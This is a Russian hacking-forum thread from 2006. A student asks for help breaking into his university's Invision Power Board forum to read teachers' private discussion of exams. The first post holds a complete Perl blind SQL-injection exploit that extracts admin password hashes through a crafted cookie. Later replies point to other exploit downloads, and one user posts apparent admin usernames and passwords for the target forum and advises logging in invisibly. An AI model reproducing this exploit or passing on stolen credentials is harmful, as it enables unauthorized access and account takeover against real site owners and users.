ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Всё тот же ipb v1.3 (U) Final ... Вопрос
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Всё тот же ipb v1.3 (U) Final ... Вопрос
  #1  
Старый 22.02.2006, 05:22
Аватар для DooDlez
DooDlez
Познающий
Регистрация: 07.02.2006
Сообщений: 40
Провел на форуме:
115789

Репутация: 8
Отправить сообщение для DooDlez с помощью ICQ
По умолчанию Всё тот же ipb v1.3 (U) Final ... Вопрос
Воощем, нада получить доступ к админу по "институтским" соображениям ... Воощем, прошел слушек, что преподаватели общаюЦЦа на форуме в закрытой теме, по поводу грядущих модулях/экзаменах ... Так что важность просто огого ...

Значить так, юзал скрипт:

Код:
use LWP::UserAgent;       $ua = new LWP::UserAgent;     $ua->agent("Mosiac 1.0" . $ua->agent);    if (!$ARGV[0]) {$ARGV[0] = '';}  if (!$ARGV[3]) {$ARGV[3] = '';}    my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';  my $user = $ARGV[1];     my $iver = $ARGV[2];     my $cpre = $ARGV[3];     my $dbug = $ARGV[4];         if (!$ARGV[0] and !$ARGV[1] and !$ARGV[2] and !$ARGV[3])  {          print "Input like ./perl ./r57ipb.pl [addres] [userid] [version] [c_fix]\r\n";          print "[addres]  = like www.site.com/forum/\r\n";          print "[userid]  = user id\r\n";          print "[version] = 1 - v1.0.x or 2 - v2.0.x\r\n";  		print "[c_fix]	 = cookie prefix by defoult its ibf_\r\n";          exit;  }    my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");    my $outputs = '';    for( $i=1; $i < 33; $i++ )  {          for( $j=0; $j < 16; $j++ )          {                  my $current = $charset[$j];              my $sql = ( $iver < 2 ) ?  "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :  "99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";                  my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);                  my $res = $ua->get($path, @cookie);                    # If we get a valid sql request then this                  # does not appear anywhere in the sources                  $pattern = '<title>(.*)Log In(.*)</title>';                    $_ = $res->content;                    if ($dbug) { print };                    if ( !(/$pattern/) )                  {                          $outputs .= $current;                          print "$i char = $current\n";                      last;                  }            }    if ( length($outputs) < 1 )   { print "Not Exploitable!\n"; exit;     }  }  print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;  exit;    # milw0rm.com [2005-05-26]
После его использования, получаю хэш из набора нулей... Терь вопрос, на форуме стоит заплатка или просто бок в скрипте...

Через приват массаги - тоже не в какую... Думал, может префикс не ibf_, не не одним сплоитом его не узнал, но, думаю, скрипт делает чек на префикс...

Заранее благодарен ...
 

  #2  
Старый 22.02.2006, 10:11
Аватар для c411k
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию
попробуй rst сплоит под ипб, или переделанный coul`a.. скинь ссылку в PM на форум
 

  #3  
Старый 22.02.2006, 11:35
Аватар для Azazel
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию
Попробуй почитать сюда http://forum.antichat.ru/thread14205.html,
а Coylовский только для 2-х версий.
 

  #4  
Старый 22.02.2006, 11:48
Аватар для DooDlez
DooDlez
Познающий
Регистрация: 07.02.2006
Сообщений: 40
Провел на форуме:
115789

Репутация: 8
Отправить сообщение для DooDlez с помощью ICQ
По умолчанию
Azazel, вот что имею пройдя по линку ...

Цитата:
Сообщение от Сообщение  
DooDlez, вы не имеете прав для доступа к этой странице. Это может быть вызвано несколькими причинами:
Ваш аккаунт имеет недостаточно прав для доступа к этой странице. Вы пытаетесь редактировать чье-то сообщение, использовать административные полномочия или прочие опции ограниченного доступа?
Вы пытаетесь написать сообщение, но ваш аккаунт отключен администрацией или ожидает активации.
Можеш отправить атач на мыло, или в ПМ оттуда ...
 

  #5  
Старый 22.02.2006, 12:09
Аватар для c411k
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию
коуловский кажись на 1 тож пашет..
2dodlez login oksana pass invision
или login Kostik pass 777
там всего 4 админа
тока заходи лу4ше в невидимом режиме
 

  #6  
Старый 22.02.2006, 12:55
Аватар для Azazel
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию
Не, тогда не могу. Отсюда можешь взять http://rst.void.ru/download/r57ipb2.txt, а что исправить поищи по форуму.
Ну да проблема я вижу уже решена.
__________________
Full DNS report
 

  #7  
Старый 22.02.2006, 14:22
Аватар для DooDlez
DooDlez
Познающий
Регистрация: 07.02.2006
Сообщений: 40
Провел на форуме:
115789

Репутация: 8
Отправить сообщение для DooDlez с помощью ICQ
По умолчанию
Проблема то решена, но вот интерес не угас... А вдруг дальше сталкнусь опять с такой же, что терь, все время вопросы задафать ...

cy4_1o1ka, можеш рассказать, как ты действовал, что использовал и т. д. ... Можно ПМ, пожно icq ...

Заранее благодарен ...
 

  #8  
Старый 24.02.2006, 07:26
Аватар для c411k
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию
юзал сплойт rst, ccылку кста азазелло дал те, так что непонятно больше ни4его.. тока там исправить надо вроде чтоб было $allchar .= chr($char); .. надеюсь ты перлом юзал? ))
 

  #9  
Старый 24.02.2006, 07:36
Аватар для DooDlez
DooDlez
Познающий
Регистрация: 07.02.2006
Сообщений: 40
Провел на форуме:
115789

Репутация: 8
Отправить сообщение для DooDlez с помощью ICQ
По умолчанию
cy4_1o1ka, нет, блин, винамп юзал ...

Спасибо за помощь ... Удаляйте топ ...
 
Закрытая тема



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вопрос: что делать после сканирования? Тайм Аут Чаты 15 04.03.2006 21:19
Вопрос о заливке шелла на форуме Powered by Invision Power Board(U) v1.3 Final 0verfe1 Форумы 7 07.01.2006 03:23
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final rsha1988 Форумы 12 15.02.2005 01:44
Вопрос про уязвимости в Invision Power Board(U) v1.3 Final Майор Форумы 15 14.01.2005 14:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ